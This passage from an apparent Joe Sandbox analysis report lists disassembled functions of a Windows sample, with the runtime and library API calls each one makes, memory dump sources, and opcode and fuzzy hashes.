                                                                                              • Part of subcall function 00A3B505: __EH_prolog.LIBCMT ref: 00A3B50A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: d67751c4e0dacdcdf8fda4f798a5b527107945bf8d64bb00be9621dbeb2449bd
                                                                                            • Instruction ID: 544466fb4590262e395c1b8478801efe22de090610b39afe2e10497700b18c37
                                                                                            • Opcode Fuzzy Hash: d67751c4e0dacdcdf8fda4f798a5b527107945bf8d64bb00be9621dbeb2449bd
                                                                                            • Instruction Fuzzy Hash: 004145B0905B409EE724DF798985AE6FBE5FF18300F50492EE5FE83282CB326654CB10
                                                                                            Function 00A4B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A4B098
                                                                                              • Part of subcall function 00A313DC: __EH_prolog.LIBCMT ref: 00A313E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 975dab0bf7eb42bcd08a9125373a325bd339d3e9f7bda6f881f0b45fff45ae7f
                                                                                            • Instruction ID: 6fac15888035a42128fe42a00d65a8d74a748b0315f428e61e803cffcddd7b68
                                                                                            • Opcode Fuzzy Hash: 975dab0bf7eb42bcd08a9125373a325bd339d3e9f7bda6f881f0b45fff45ae7f
                                                                                            • Instruction Fuzzy Hash: FC317C75C102499FCF15DFA8CA51AEEBBB4AF49300F10449EE809B7242D735AE04CB71
                                                                                            Function 00A5AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00A5ACF8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID:
                                                                                            • API String ID: 190572456-0
                                                                                            • Opcode ID: 13d69c9388f2968c8b84b4448e59ac68ce3222ef59e2b5e5dc2b7764ac293d95
                                                                                            • Instruction ID: 7724333e6594b2339f6a70cdb341e1b73cd7e730f1f4116f985f3e028be3eb1d
                                                                                            • Opcode Fuzzy Hash: 13d69c9388f2968c8b84b4448e59ac68ce3222ef59e2b5e5dc2b7764ac293d95
                                                                                            • Instruction Fuzzy Hash: C611E337B006256F9B22EFACEC50A5A73B5FB943227164320FD15AB254D630DC0687D2
                                                                                            Function 00A39215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 0b82419833aa537b694a07a7e0ef6e481ba251f22959a2f13164622bce4d0898
                                                                                            • Instruction ID: 49d1a2864cfe904eda6dbe1e859a81cfae9ec71f75c47dc066cbaea9c9cb5e26
                                                                                            • Opcode Fuzzy Hash: 0b82419833aa537b694a07a7e0ef6e481ba251f22959a2f13164622bce4d0898
                                                                                            • Instruction Fuzzy Hash: 52016573900928ABCF11ABA8CD819DFB775BF88750F014515F816BB152DA748D05C6A0
                                                                                            Function 00A5C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A5B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A59813,00000001,00000364,?,00A53F73,00000050,?,00A71030,00000200), ref: 00A5B177
                                                                                            • _free.LIBCMT ref: 00A5C4E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 614378929-0
                                                                                            • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                            • Instruction ID: 2fac46e7d4f4f1a1c9cefa8d8dc6de61319c6bd2fe35dad2fd66a89cbf416a2e
                                                                                            • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                            • Instruction Fuzzy Hash: 6B01D6722003056FE3318F659885D6AFBF9FB85371F25061DE994932C1EA30A909C774
                                                                                            Function 00A5B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A59813,00000001,00000364,?,00A53F73,00000050,?,00A71030,00000200), ref: 00A5B177
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: f3d4779359e1c53e40df98fc082321062a6c7991b349f08aca7efd6470f11f28
                                                                                            • Instruction ID: be3c3c3784e119fec42118182e1177d49cd92383c0476dd89a38fe3ddc605f47
                                                                                            • Opcode Fuzzy Hash: f3d4779359e1c53e40df98fc082321062a6c7991b349f08aca7efd6470f11f28
                                                                                            • Instruction Fuzzy Hash: A8F0B432625924B7DBA15B72AD25B9F7758BB51763B188311FC08AA190CF30D90986F0
                                                                                            Function 00A53C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00A53C3F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID:
                                                                                            • API String ID: 190572456-0
                                                                                            • Opcode ID: f2cdeea1508385f837b8899fa58419d76b1cc9a9bee106aa345d581a30d7117b
                                                                                            • Instruction ID: cf6ebb1b385a6fa8c72dc432c6a31e703a04fd91a4a8089995e2a3907b34ab91
                                                                                            • Opcode Fuzzy Hash: f2cdeea1508385f837b8899fa58419d76b1cc9a9bee106aa345d581a30d7117b
                                                                                            • Instruction Fuzzy Hash: 60F0A733205216AF8F118FA8FC0099A77A9FF91BA37104125FE05E7190DB31DA28C790
                                                                                            Function 00A58E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A5CA2C,00000000,?,00A56CBE,?,00000008,?,00A591E0,?,?,?), ref: 00A58E38
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 8b16b73721a81cc006aa8408b493b34cf5bd71073b2fcf3af5c2127c0c5868ab
                                                                                            • Instruction ID: 46e0180e54ad4641046155962b46c101d7f0e33d98b30bf696ae3495f0cd0b0c
                                                                                            • Opcode Fuzzy Hash: 8b16b73721a81cc006aa8408b493b34cf5bd71073b2fcf3af5c2127c0c5868ab
                                                                                            • Instruction Fuzzy Hash: 6FE065312061255AEA7127659D06B9F7678BF517A6F150111BC19B6091DF7CCC0982E1
                                                                                            Function 00A35ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A35AC2
                                                                                              • Part of subcall function 00A3B505: __EH_prolog.LIBCMT ref: 00A3B50A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: ab749c61a8ff48e730cccc1c07e5a7fdb5120e57ee4cc81dcb6bbff6cf22ae37
                                                                                            • Instruction ID: 788ca7179571458a620a85d850edd34a8788269b22170af1b4d646db8e174fec
                                                                                            • Opcode Fuzzy Hash: ab749c61a8ff48e730cccc1c07e5a7fdb5120e57ee4cc81dcb6bbff6cf22ae37
                                                                                            • Instruction Fuzzy Hash: 7E018C349106D0DAD725EBB8C241FDDFBA4DFA4304F51848DA55763282CBB41B08E7A2
                                                                                            Function 00A3A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A3A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6C4
                                                                                              • Part of subcall function 00A3A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6F2
                                                                                              • Part of subcall function 00A3A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6FE
                                                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A3A598
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1464966427-0
                                                                                            • Opcode ID: 7c31460758a6ee921aba111506c79bf125b55eae0569ee5eec2d6f4b87534ef5
                                                                                            • Instruction ID: 837e4280af6ad67576eab6bbf6a78a8eced959a66d51fcae33680e7f389ac292
                                                                                            • Opcode Fuzzy Hash: 7c31460758a6ee921aba111506c79bf125b55eae0569ee5eec2d6f4b87534ef5
                                                                                            • Instruction Fuzzy Hash: 68F082320087A0ABCB2257F48A05BCB7BA06F2A331F048A4DF1FD521A6C37550999B33
                                                                                            Function 00A40E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00A40E3D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecutionStateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2211380416-0
                                                                                            • Opcode ID: ced07509aa5887af2ccf69ba32dd02c064b1cd0e21cb5f266df172d797aa417c
                                                                                            • Instruction ID: fa8f3b3b44e68215f7748c37a650f089c2ae3e27aeb5556d396d6b7d08a66b81
                                                                                            • Opcode Fuzzy Hash: ced07509aa5887af2ccf69ba32dd02c064b1cd0e21cb5f266df172d797aa417c
                                                                                            • Instruction Fuzzy Hash: 38D01215A010546ADA1173686A56BFF29468FC6315F0D4465F14957182DA684CC7B261
                                                                                            Function 00A4A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GdipAlloc.GDIPLUS(00000010), ref: 00A4A62C
                                                                                              • Part of subcall function 00A4A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A4A3DA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                            • String ID:
                                                                                            • API String ID: 1915507550-0
                                                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                            • Instruction ID: 962a665f2f3ea88f453dbb402df6b5d163f7564295699c514a6a78523f89f788
                                                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                            • Instruction Fuzzy Hash: EBD0A77924020876DF01AF218D0296EB595EB90340F10C021B841C5142FAB1D9109156
                                                                                            Function 00A4E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DloadProtectSection.DELAYIMP ref: 00A4E5E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: DloadProtectSection
                                                                                            • String ID:
                                                                                            • API String ID: 2203082970-0
                                                                                            • Opcode ID: c41a76a30f9d0ed5d32e6353ad1d317c22a20d51b5a419f81eb03b41846b804d
                                                                                            • Instruction ID: c0df8d95620f4d29909c9ee824a75d911945a2dbfc0436e40ac34beefe0d259e
                                                                                            • Opcode Fuzzy Hash: c41a76a30f9d0ed5d32e6353ad1d317c22a20d51b5a419f81eb03b41846b804d
                                                                                            • Instruction Fuzzy Hash: F6D012BC6C02819BDB41EBFCA946F1433A4B3A4715F940502F245E1491DFA44882C606
                                                                                            Function 00A4DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00A41B3E), ref: 00A4DD92
                                                                                              • Part of subcall function 00A4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
                                                                                              • Part of subcall function 00A4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
                                                                                              • Part of subcall function 00A4B568: IsDialogMessageW.USER32(00010426,?), ref: 00A4B59E
                                                                                              • Part of subcall function 00A4B568: TranslateMessage.USER32(?), ref: 00A4B5AC
                                                                                              • Part of subcall function 00A4B568: DispatchMessageW.USER32(?), ref: 00A4B5B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                            • String ID:
                                                                                            • API String ID: 897784432-0
                                                                                            • Opcode ID: fb3312c20baccc843bc47835c797e08347125b924fd90a1c611ae66fbe70b9dc
                                                                                            • Instruction ID: 63b0f908d89d66a36bdfc3c74d2ed754b0f78049b4fa8c9f0dfe8ca4b9fc8f36
                                                                                            • Opcode Fuzzy Hash: fb3312c20baccc843bc47835c797e08347125b924fd90a1c611ae66fbe70b9dc
                                                                                            • Instruction Fuzzy Hash: 96D09E36144300BADA016B91CE06F0A7AA2AB98B08F004955B389740F18AB29D61EB12
                                                                                            Function 00A398BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(000000FF,00A397BE), ref: 00A398C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: f0b97a5b026ad3e2b3c05499c640a7a775edec1e2c978619d6385d6150fd7524
                                                                                            • Instruction ID: 729b4d39558fcfb4834db19cdf36f7381a774bdfd01348f2885fdf0dffef6cf3
                                                                                            • Opcode Fuzzy Hash: f0b97a5b026ad3e2b3c05499c640a7a775edec1e2c978619d6385d6150fd7524
                                                                                            • Instruction Fuzzy Hash: 79C00235404205958E2197249845096B761AA93365BB496D4E069850B1C362CD57EE11
                                                                                            Function 00A4E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
